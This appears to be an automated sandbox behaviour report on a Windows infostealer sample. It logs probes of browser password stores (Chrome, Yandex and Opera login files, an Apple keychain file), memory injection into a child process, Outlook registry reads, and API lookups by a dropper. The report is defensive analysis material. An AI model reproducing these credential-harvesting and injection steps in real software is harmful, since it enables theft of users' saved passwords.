File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Web Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Login Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Crashpad\Web Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Crashpad\Login Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Web Data, type = file_attributes True 1
Fn
File Get Info type = size, size_out = 0 True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Login Data, type = file_attributes True 1
Fn
File Get Info type = size, size_out = 0 True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\EVWhitelist\Web Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\EVWhitelist\Login Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Web Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Login Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\OriginTrials\Web Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\OriginTrials\Login Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\PepperFlash\Web Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\PepperFlash\Login Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\pnacl\Web Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\pnacl\Login Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Web Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Login Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\SwReporter\Web Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\SwReporter\Login Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\WidevineCdm\Web Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\WidevineCdm\Login Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Roaming\Apple Computer\Preferences\keychain.plist, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Roaming\Opera\Opera\wand.dat, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Roaming\Opera\Opera7\profile\wand.dat, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Roaming\Opera Software\Opera Stable\Login Data, type = file_attributes False 1
Fn
File Write size = 3 True 1
Fn
Data
File Write size = 1 True 1
Fn
Data
File Write size = 11 True 1
Fn
Data
File Write size = 1 True 1
Fn
Data
File Write size = 9 True 1
Fn
Data
File Write size = 1 True 1
Fn
Data
File Write size = 8 True 1
Fn
Data
File Write size = 1 True 1
Fn
Data
File Write size = 17 True 1
Fn
Data
File Write size = 1 True 1
Fn
Data
File Write size = 15 True 1
Fn
Data
File Write size = 1 True 1
Fn
Data
File Write size = 14 True 1
Fn
Data
File Write size = 1 True 1
Fn
Data
File Write size = 12 True 1
Fn
Data
File Write size = 1 True 1
Fn
Data
File Write size = 13 True 1
Fn
Data
File Write size = 2 True 1
Fn
Data
Process #12: syncpack_.exe
46 0
Information Value
ID #12
File Name c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:03:23, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:45
OS Process Information
Information Value
PID 0x834
Parent PID 0xb70 (c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x8A8
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory Readable True False False -
private_0x0000000000050000 0x00050000 0x00050fff Private Memory Readable, Writable True False False -
private_0x00000000000b0000 0x000b0000 0x0012ffff Private Memory Readable, Writable True False False -
locale.nls 0x00130000 0x00196fff Memory Mapped File Readable False False False -
private_0x00000000001c0000 0x001c0000 0x002bffff Private Memory Readable, Writable True False False -
private_0x00000000002c0000 0x002c0000 0x003bffff Private Memory Readable, Writable True False False -
private_0x00000000003c0000 0x003c0000 0x003cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000003d0000 0x003d0000 0x00557fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000560000 0x00560000 0x006e0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000006f0000 0x006f0000 0x01aeffff Pagefile Backed Memory Readable True False False -
kernel32.dll 0x777e0000 0x778fefff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x77900000 0x779f9fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fffa000 0x7fffa000 0x7fffafff Private Memory Readable, Writable True False False -
syncpack_.exe 0xffab0000 0xffac5fff Memory Mapped File Readable, Writable, Executable True True False
private_0x0000000140000000 0x140000000 0x14001efff Private Memory Readable, Writable, Executable True False False -
kernelbase.dll 0x7fefda00000 0x7fefda6afff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x7fefdd20000 0x7fefdd86fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7fefde80000 0x7fefdf1efff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x7fefdf20000 0x7fefdf90fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x7fefe040000 0x7fefe242fff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x7fefe4b0000 0x7fefe58afff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x7fefe9c0000 0x7feff747fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x7feff750000 0x7feff76efff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x7feff770000 0x7feff838fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x7feffa40000 0x7feffb6cfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x7feffb70000 0x7feffc78fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x7feffcd0000 0x7feffcfdfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x7feffd00000 0x7feffd0dfff Memory Mapped File Readable, Writable, Executable False False False -
apisetschema.dll 0x7feffd20000 0x7feffd20fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory Readable True False False -
private_0x000007fffffd8000 0x7fffffd8000 0x7fffffd8fff Private Memory Readable, Writable True False False -
private_0x000007fffffde000 0x7fffffde000 0x7fffffdffff Private Memory Readable, Writable True False False -
Injection Information
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x86c address = 0x140000000, size = 126976 True 1
Fn
Data
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x86c address = 0x7fffffd8010, size = 8 True 1
Fn
Data
Modify Control Flow #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x86c os_tid = 0x8a8, address = 0x0 True 1
Fn
Threads
Thread 0x8a8
46 0
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-06-25 14:54:25 (UTC) True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x777e0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x777f7190 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsFree, address_out = 0x777f15b0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x77803520 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x777fbd90 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x777f79b0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CreateEventExW, address_out = 0x7782c590 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x7782c4c0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x777e8050 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x777e8820 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x77a1b2f0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x77a0d8c0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x77a0d620 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x7782ba80 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetThreadpoolWait, address_out = 0x77a1e170 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x77a0c540 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77a51f80 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x77acec60 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77a50040 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x7782b820 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x77855ad0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x7782c3d0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CompareStringEx, address_out = 0x7782b980 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = GetDateFormatEx, address_out = 0x77870920 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x777e3c10 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = GetTimeFormatEx, address_out = 0x7786d4e0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x7782b790 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = IsValidLocaleName, address_out = 0x7782b770 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = LCMapStringEx, address_out = 0x7782b710 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = GetTickCount64, address_out = 0x777e9450 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe, size = 260 True 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x7fefe4b0000 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x7fefe040000 True 1
Fn
Registry Create Key reg_name = HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook, value_name = DLLPathEx, data = 67 True 1
Fn
Module Load module_name = C:\PROGRA~2\MICROS~1\Office12\OLMAPI32.DLL, base_address = 0x0 False 1
Fn
Module Get Handle module_name = mscoree.dll False 1
Fn
Process #13: surtq5qk9h.exe
2275 0
Information Value
ID #13
File Name c:\programdata\surtq5qk9h.exe
Command Line "C:\ProgramData\suRtQ5QK9h.exe"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:03:32, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:36
OS Process Information
Information Value
PID 0x7b4
Parent PID 0xb70 (c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x588
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False -
locale.nls 0x000a0000 0x00106fff Memory Mapped File Readable False False False -
private_0x0000000000110000 0x00110000 0x0013ffff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x0011ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000120000 0x00120000 0x00126fff Pagefile Backed Memory Readable True False False -
private_0x0000000000130000 0x00130000 0x0013ffff Private Memory Readable, Writable True False False -
rsaenh.dll 0x00140000 0x0017bfff Memory Mapped File Readable False False False -
~df91d880e8a18f5eb9.tmp 0x00140000 0x001bffff Memory Mapped File Readable, Writable True True False
pagefile_0x00000000001c0000 0x001c0000 0x001c1fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000001d0000 0x001d0000 0x001dffff Private Memory Readable, Writable True False False -
private_0x00000000001e0000 0x001e0000 0x0025ffff Private Memory Readable, Writable True False False -
private_0x0000000000260000 0x00260000 0x0026ffff Private Memory Readable, Writable True False False -
private_0x0000000000270000 0x00270000 0x00271fff Private Memory Readable, Writable True False False -
private_0x0000000000290000 0x00290000 0x0030ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000310000 0x00310000 0x003eefff Pagefile Backed Memory Readable True False False -
surtq5qk9h.exe 0x00400000 0x00451fff Memory Mapped File Readable, Writable, Executable True False False -
private_0x0000000000460000 0x00460000 0x0cabffff Private Memory Readable, Writable True False False -
pagefile_0x000000000cac0000 0x0cac0000 0x0cc47fff Pagefile Backed Memory Readable True False False -
private_0x000000000ccb0000 0x0ccb0000 0x0cdaffff Private Memory Readable, Writable True False False -
pagefile_0x000000000cdb0000 0x0cdb0000 0x0cf30fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000000cf40000 0x0cf40000 0x0e33ffff Pagefile Backed Memory Readable True False False -
private_0x000000000e340000 0x0e340000 0x0e73ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x0e740000 0x0ea0efff Memory Mapped File Readable False False False -
private_0x000000000ea10000 0x0ea10000 0x0ebcffff Private Memory Readable, Writable True False False -
private_0x000000000ea10000 0x0ea10000 0x0eb7ffff Private Memory Readable, Writable True False False -
private_0x000000000ea10000 0x0ea10000 0x0eb2ffff Private Memory Readable, Writable True False False -
private_0x000000000eb40000 0x0eb40000 0x0eb7ffff Private Memory Readable, Writable True False False -
private_0x000000000eb90000 0x0eb90000 0x0ebcffff Private Memory Readable, Writable True False False -
private_0x000000000ebd0000 0x0ebd0000 0x0ed3ffff Private Memory Readable, Writable True False False -
private_0x000000000ebd0000 0x0ebd0000 0x0eccffff Private Memory Readable, Writable True False False -
private_0x000000000ed30000 0x0ed30000 0x0ed3ffff Private Memory Readable, Writable True False False -
pagefile_0x000000000ed40000 0x0ed40000 0x0f13ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000000000f140000 0x0f140000 0x0f532fff Pagefile Backed Memory Readable True False False -
staticcache.dat 0x0f540000 0x0fe6ffff Memory Mapped File Readable False False False -
private_0x000000000fe70000 0x0fe70000 0x1006ffff Private Memory Readable, Writable True False False -
asycfilt.dll 0x6fcd0000 0x6fce3fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
msvbvm60.dll 0x72940000 0x72a92fff Memory Mapped File Readable, Writable, Executable True False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x74ec0000 0x74ed2fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
sxs.dll 0x752d0000 0x7532efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Created Files
Filename File Size Hash Values YARA Match Actions
c:\users\kft6utqw\appdata\local\temp\~df91d880e8a18f5eb9.tmp 16.00 KB MD5: ce338fe6899778aacfc28414f2d9498b
SHA1: 897256b6709e1a4da9daba92b6bde39ccfccd8c1
SHA256: 4fe7b59af6de3b665b67788cc2f99892ab827efae3a467342b3bb4e3bc8e5bfe
False
Threads
Thread 0x588
2085 0
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsTNT, address_out = 0x0 False 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
Module Get Filename process_name = c:\programdata\surtq5qk9h.exe, file_name_orig = C:\ProgramData\suRtQ5QK9h.exe, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75fc5235 True 1
Fn
Mutex Create - True 1
Fn
Module Get Handle module_name = c:\programdata\surtq5qk9h.exe, base_address = 0x400000 True 1
Fn
Module Get Filename process_name = c:\programdata\surtq5qk9h.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Filename process_name = c:\programdata\surtq5qk9h.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
Module Get Filename module_name = c:\programdata\surtq5qk9h.exe, process_name = c:\programdata\surtq5qk9h.exe, file_name_orig = C:\ProgramData\suRtQ5QK9h.exe, size = 260 True 1
Fn
Module Get Filename process_name = c:\programdata\surtq5qk9h.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = OLEAUT32.DLL, base_address = 0x75a00000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = OleLoadPictureEx, address_out = 0x75a670a1 True 1
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\oleaut32.dll, base_address = 0x75a00000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = DispCallFunc, address_out = 0x75a13dcf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = LoadTypeLibEx, address_out = 0x75a107b7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = UnRegisterTypeLib, address_out = 0x75a31ca9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = CreateTypeLib2, address_out = 0x75a18e70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDateFromUdate, address_out = 0x75a17684 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarUdateFromDate, address_out = 0x75a1cc98 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetAltMonthNames, address_out = 0x75a4903a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNumFromParseNum, address_out = 0x75a16231 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarParseNumFromStr, address_out = 0x75a15fea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR4, address_out = 0x75a23f94 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR8, address_out = 0x75a24e9e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromDate, address_out = 0x75a4db72 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromI4, address_out = 0x75a32a8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromCy, address_out = 0x75a4d737 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarR4FromDec, address_out = 0x75a4e015 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromTypeInfo, address_out = 0x75a4cc3d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromGuids, address_out = 0x75a4d1c4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetRecordInfo, address_out = 0x75a4d48c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetRecordInfo, address_out = 0x75a4d4c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetIID, address_out = 0x75a4d509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetIID, address_out = 0x75a1e7bb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCopyData, address_out = 0x75a1e496 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayAllocDescriptorEx, address_out = 0x75a1ddf1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCreateEx, address_out = 0x75a4d53f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormat, address_out = 0x75a52055 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatDateTime, address_out = 0x75a520ea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatNumber, address_out = 0x75a52151 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatPercent, address_out = 0x75a521f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatCurrency, address_out = 0x75a52288 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarWeekdayName, address_out = 0x75a52335 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMonthName, address_out = 0x75a523d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAdd, address_out = 0x75a25934 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAnd, address_out = 0x75a25a98 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCat, address_out = 0x75a259b4 True 1
Fn
